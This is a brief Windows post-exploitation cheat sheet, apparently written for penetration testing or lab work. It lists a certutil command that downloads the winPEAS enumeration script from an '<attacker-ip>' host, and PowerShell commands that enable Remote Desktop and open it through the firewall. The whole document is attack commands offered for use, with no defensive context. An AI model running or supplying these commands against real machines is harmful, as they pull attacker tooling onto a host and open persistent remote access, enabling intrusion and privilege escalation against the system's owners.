# Windows

## CertUtil download file

```
certutil.exe -urlcache -split -f "http://<attacker-ip>:8081/winPEAS.bat" winpeas.bat
```

## Enable RDP

Leverage powershell to enable rdp. Remember that by default, only one account can be logged.

```
#enable RDP
powershell Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

#allow rdp through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```